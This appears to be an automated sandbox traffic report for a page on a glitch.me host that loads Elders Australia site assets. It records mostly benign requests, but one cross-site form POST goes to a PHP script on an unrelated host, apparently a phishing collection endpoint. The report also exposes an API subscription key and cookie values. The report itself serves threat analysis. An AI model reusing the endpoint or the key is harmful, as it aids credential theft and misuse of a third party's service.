      Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /api/v1/WeatherDetail?postCode=5000 HTTP/1.1Host: apimprd.ext.elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Ocp-Apim-Subscription-Key: 93e156a515ad4dd497c991b125dffcc2sec-ch-ua-platform: "Windows"Origin: https://elders.com.auSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site/resources/fonts/Meta-Pro-Normal.ttf HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://elders.com.ausec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site.lc-b12902665e7f329d47d0e56b8a41e8e6-lc.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CMCSYNCSOP%7C411-20041%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=253007270729203&ev=PageView&dl=https%3A%2F%2Felders.com.au%2F&rl=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&if=false&ts=1730870999319&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.2.1730870995963.946583266334009605&ler=other&cdl=API_unavailable&it=1730870992696&coo=false&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /errors/404/ HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CMCSYNCSOP%7C411-20041%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /api/v1/WeatherDetail?postCode=5000 HTTP/1.1Host: apimprd.ext.elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CMCSYNCSOP%7C411-20041%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/weather-icons/partly_cloudy.svg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; s_gpv=elders:homepage; s_plt=NaN; s_pltp=undefined; prevPageName=elders%3Ahomepage; prevPageURL=https%3A%2F%2Felders.com.au%2F; _clck=psztdz%7C2%7Cfqn%7C0%7C1771; s_cc=true; affinity="ca2eaa8d2549435a"; _fbp=fb.2.1730870995963.946583266334009605; _clsk=yv6tsn%7C1730870996130%7C1%7C1%7Cf.clarity.ms%2Fcollect; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CMCSYNCSOP%7C411-20041%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /api/v5/symbols/eld.asx?appID=40cb4d5b590922d8&consolidate=1&liveness=delayed HTTP/1.1Host: yourir.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://elders.com.auSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /lib/1.15.18/yourir.js HTTP/1.1Host: yourir.infoConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: chromecache_161.1.drString found in binary or memory: <a data-cmp-clickable href="http://www.linkedin.com/company/elderslimited/" target="_blank" class="column-light" rel="noopener"> equals www.linkedin.com (Linkedin)
      Source: chromecache_161.1.drString found in binary or memory: <a data-cmp-clickable href="https://www.facebook.com/EldersRuralServices" target="_blank" class="column-light" rel="noopener"> equals www.facebook.com (Facebook)
      Source: chromecache_161.1.drString found in binary or memory: <a data-cmp-clickable href="https://www.youtube.com/user/EldersLimited" target="_blank" class="column-light" rel="noopener"> equals www.youtube.com (Youtube)
      Source: chromecache_161.1.drString found in binary or memory: <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=1013340413305983&ev=PageView&noscript=1"/></noscript> equals www.facebook.com (Facebook)
      Source: chromecache_175.1.drString found in binary or memory: _satellite.__registerScript('https://assets.adobedtm.com/728d44811931/14db0b582053/cbed442a9121/RCbad2c954d87f48819c96e16d0db6567c-source.min.js', "<script>\nconsole.log('Global | Ad Pixel Started');\n</script>\n\n<!-- Meta Pixel Code -->\n<script>\n!function(f,b,e,v,n,t,s)\n{if(f.fbq)return;n=f.fbq=function(){n.callMethod?\nn.callMethod.apply(n,arguments):n.queue.push(arguments)};\nif(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';\nn.queue=[];t=b.createElement(e);t.async=!0;\nt.src=v;s=b.getElementsByTagName(e)[0];\ns.parentNode.insertBefore(t,s)}(window, document,'script',\n'https://connect.facebook.net/en_US/fbevents.js');\nfbq('init', '842278510644971');\nfbq('track', 'PageView');\n</script>\n<noscript><img height=\"1\" width=\"1\" style=\"display:none\"\nsrc=https://www.facebook.com/tr?id=842278510644971&ev=PageView&noscript=1\n/></noscript>\n<!-- End Meta Pixel Code -->\n\n<!-- Meta Pixel Code -->\n<script>\n!function(f,b,e,v,n,t,s)\n{if(f.fbq)return;n=f.fbq=function(){n.callMethod?\nn.callMethod.apply(n,arguments):n.queue.push(arguments)};\nif(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';\nn.queue=[];t=b.createElement(e);t.async=!0;\nt.src=v;s=b.getElementsByTagName(e)[0];\ns.parentNode.insertBefore(t,s)}(window, document,'script',\n'https://connect.facebook.net/en_US/fbevents.js');\nfbq('init', '253007270729203');\nfbq('track', 'PageView');\n</script>\n<noscript><img height=\"1\" width=\"1\" style=\"display:none\"\nsrc=https://www.facebook.com/tr?id=253007270729203&ev=PageView&noscript=1\n/></noscript>\n<!-- End Meta Pixel Code -->\n\n\n<script>\nconsole.log('Global | Ad Pixel Ended');\n</script>\n"); equals www.facebook.com (Facebook)
      Source: chromecache_111.1.dr, chromecache_203.1.drString found in binary or memory: return b}lD.F="internal.enableAutoEventOnTimer";var Yb=ka(["data-gtm-yt-inspected-"]),nD=["www.youtube.com","www.youtube-nocookie.com"],oD,pD=!1; equals www.youtube.com (Youtube)
      Source: chromecache_157.1.drString found in binary or memory: return function(a,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var b=f.getFbeventsModules("signalsFBEventsGetTier"),c=d();function d(){try{if(a.trustedTypes&&a.trustedTypes.createPolicy){var b=a.trustedTypes;return b.createPolicy("facebook.com/signals/iwl",{createScriptURL:function(a){var b=new URL(a);b=b.hostname.endsWith(".facebook.com")&&b.pathname=="/signals/iwl.js";if(!b)throw new Error("Disallowed script URL");return a}})}}catch(a){}return null}e.exports=function(a,d){d=b(d);d=d==null?"www.facebook.com":"www."+d+".facebook.com";d="https://"+d+"/signals/iwl.js?pixel_id="+a;if(c!=null)return c.createScriptURL(d);else return d}})();return e.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
      Source: chromecache_157.1.drString found in binary or memory: return function(f,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var a=/^https:\/\/www\.([A-Za-z0-9\.]+)\.facebook\.com\/tr\/?$/,b=["https://www.facebook.com/tr","https://www.facebook.com/tr/"];e.exports=function(c){if(b.indexOf(c)!==-1)return null;var d=a.exec(c);if(d==null)throw new Error("Malformed tier: "+c);return d[1]}})();return e.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
      Source: chromecache_157.1.drString found in binary or memory: return function(f,g,h,i){var j={exports:{}};j.exports;(function(){"use strict";var a={ENDPOINT:"https://www.facebook.com/tr/",INSTAGRAM_TRIGGER_ATTRIBUTION:"https://www.instagram.com/tr/",AEM_ENDPOINT:"https://www.facebook.com/.well-known/aggregated-event-measurement/",GPS_ENDPOINT:"https://www.facebook.com/privacy_sandbox/pixel/register/trigger/",TOPICS_API_ENDPOINT:"https://www.facebook.com/privacy_sandbox/topics/registration/"};j.exports=a})();return j.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
      Source: global trafficDNS traffic detected: DNS query: astonishing-maize-sunstone.glitch.me
      Source: global trafficDNS traffic detected: DNS query: kit.fontawesome.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: upload.wikimedia.org
      Source: global trafficDNS traffic detected: DNS query: logo.clearbit.com
      Source: global trafficDNS traffic detected: DNS query: milo.za.com
      Source: global trafficDNS traffic detected: DNS query: elders.com.au
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: unpkg.com
      Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
      Source: global trafficDNS traffic detected: DNS query: assets.adobedtm.com
      Source: global trafficDNS traffic detected: DNS query: connect.facebook.net
      Source: global trafficDNS traffic detected: DNS query: www.clarity.ms
      Source: global trafficDNS traffic detected: DNS query: dpm.demdex.net
      Source: global trafficDNS traffic detected: DNS query: eldersrural.demdex.net
      Source: global trafficDNS traffic detected: DNS query: cdn.mouseflow.com
      Source: global trafficDNS traffic detected: DNS query: cm.everesttech.net
      Source: global trafficDNS traffic detected: DNS query: f.clarity.ms
      Source: global trafficDNS traffic detected: DNS query: eldersrural.sc.omtrdc.net
      Source: global trafficDNS traffic detected: DNS query: www.facebook.com
      Source: global trafficDNS traffic detected: DNS query: apimprd.ext.elders.com.au
      Source: global trafficDNS traffic detected: DNS query: yourir.info
      Source: unknownHTTP traffic detected: POST //pood/phpp4all.php HTTP/1.1Host: milo.za.comConnection: keep-aliveContent-Length: 260sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDFMSGeSNRptCuEfwAccept: */*Origin: https://astonishing-maize-sunstone.glitch.meSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://astonishing-maize-sunstone.glitch.me/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: chromecache_171.1.drString found in binary or memory: http://fontawesome.io
      Source: chromecache_171.1.drString found in binary or memory: http://fontawesome.io/license
      Source: chromecache_186.1.dr, chromecache_119.1.drString found in binary or memory: http://github.com/kenwheeler/slick
      Source: chromecache_186.1.dr, chromecache_119.1.drString found in binary or memory: http://github.com/kenwheeler/slick/issues
      Source: chromecache_205.1.dr, chromecache_113.1.drString found in binary or memory: http://jquery.com/
      Source: chromecache_205.1.dr, chromecache_113.1.drString found in binary or memory: http://jquery.org/license
      Source: chromecache_186.1.dr, chromecache_119.1.drString found in binary or memory: http://kenwheeler.github.io
      Source: chromecache_186.1.dr, chromecache_119.1.drString found in binary or memory: http://kenwheeler.github.io/slick
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: http://modernizr.com/docs/#prefixed)
      Source: chromecache_194.1.drString found in binary or memory: http://ns.attribution.com/ads/1.0/
      Source: chromecache_205.1.dr, chromecache_113.1.drString found in binary or memory: http://sizzlejs.com/
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: http://www.andismith.com/blog/2012/02/modernizr-prefixed/)
      Source: chromecache_186.1.dr, chromecache_112.1.dr, chromecache_145.1.dr, chromecache_119.1.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: chromecache_186.1.dr, chromecache_119.1.drString found in binary or memory: http://www.apache.org/licenses/LICENSE2.0
      Source: chromecache_161.1.drString found in binary or memory: http://www.linkedin.com/company/elderslimited/
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: http://www.quirksmode.org/js/events_properties.html
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: http://www.whatwg.org/specs/web-apps/current-work/multipage/the-input-element.html#input-type-attr-s
      Source: chromecache_161.1.drString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js
      Source: chromecache_175.1.drString found in binary or memory: https://assets.adobedtm.com/728d44811931/14db0b582053/cbed442a9121/RCbad2c954d87f48819c96e16d0db6567
      Source: chromecache_197.1.dr, chromecache_114.1.drString found in binary or memory: https://assets.adobedtm.com/728d44811931/14db0b582053/launch-f5e74cc94fc9.js
      Source: chromecache_161.1.drString found in binary or memory: https://assets.adobedtm.com/728d44811931/14db0b582053/launch-f5e74cc94fc9.min.js
      Source: chromecache_174.1.dr, chromecache_141.1.drString found in binary or memory: https://assets.adobedtm.com/extensions/EP8757b503532a44a68eee17773f6f10a0/AppMeasurement.js
      Source: chromecache_215.1.dr, chromecache_213.1.drString found in binary or memory: https://assets.adobedtm.com/extensions/EP8757b503532a44a68eee17773f6f10a0/AppMeasurement_Module_Acti
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=608416
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=8538
      Source: chromecache_186.1.dr, chromecache_119.1.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=210934
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1276240
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=208427
      Source: chromecache_111.1.dr, chromecache_203.1.drString found in binary or memory: https://cct.google/taggy/agent.js
      Source: chromecache_161.1.drString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
      Source: chromecache_111.1.dr, chromecache_203.1.drString found in binary or memory: https://cdn.mouseflow.com/projects/
      Source: chromecache_161.1.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css
      Source: chromecache_165.1.dr, chromecache_184.1.drString found in binary or memory: https://cloud.google.com/contact
      Source: chromecache_165.1.dr, chromecache_184.1.drString found in binary or memory: https://cloud.google.com/recaptcha-enterprise/billing-information
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=355103
      Source: chromecache_208.1.dr, chromecache_157.1.drString found in binary or memory: https://connect.facebook.net/
      Source: chromecache_167.1.dr, chromecache_175.1.dr, chromecache_161.1.drString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
      Source: chromecache_208.1.dr, chromecache_157.1.drString found in binary or memory: https://connect.facebook.net/log/fbevents_telemetry/
      Source: chromecache_198.1.drString found in binary or memory: https://creativecommons.org/licenses/by-nd/3.0/legalcode)
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/AnimationEvent
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/EventTarget/addEventListener#Safely_detecting_optio
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/KeyboardEvent#Key_names
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/TransitionEvent
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Math/clz32
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/is
      Source: chromecache_186.1.dr, chromecache_119.1.drString found in binary or memory: https://developer.mozilla.org/enUS/docs/Web/API/Element/closest#Polyfill
      Source: chromecache_186.1.dr, chromecache_119.1.drString found in binary or memory: https://developer.mozilla.org/enUS/docs/Web/API/Element/matches#Polyfill
      Source: chromecache_165.1.dr, chromecache_184.1.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca
      Source: chromecache_165.1.dr, chromecache_184.1.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#localhost_support
      Source: chromecache_165.1.dr, chromecache_184.1.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que
      Source: chromecache_161.1.drString found in binary or memory: https://elders.com.au/
      Source: chromecache_161.1.drString found in binary or memory: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site/resources/images/png/logo-elders.p
      Source: chromecache_161.1.drString found in binary or memory: https://eldersonline.elders.com.au/dcxpgmlib/sa1/ecpwp0001.html?PANEL=HOME
      Source: chromecache_161.1.drString found in binary or memory: https://eldersonline.elders.com.au/dcxpgmlib/sa1/ecpwp0001.html?PANEL=HOME&#34;
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://electronjs.org/docs/api/webview-tag
      Source: chromecache_118.1.dr, chromecache_170.1.drString found in binary or memory: https://getbootstrap.com/)
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/create-react-app/issues/3482
      Source: chromecache_181.1.dr, chromecache_128.1.drString found in binary or memory: https://github.com/facebook/react/issues
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/issues/11347
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/issues/11768
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/issues/11807
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/issues/11918
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/issues/12502
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/issues/12506
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/issues/12995
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/issues/13188
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/issues/13222
      Source: chromecache_181.1.dr, chromecache_146.1.dr, chromecache_128.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/issues/13610
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/issues/13688
      Source: chromecache_146.1.dr, chromecache_129.1.drString found in binary or memory: https://github.com/facebook/react/issues/14239
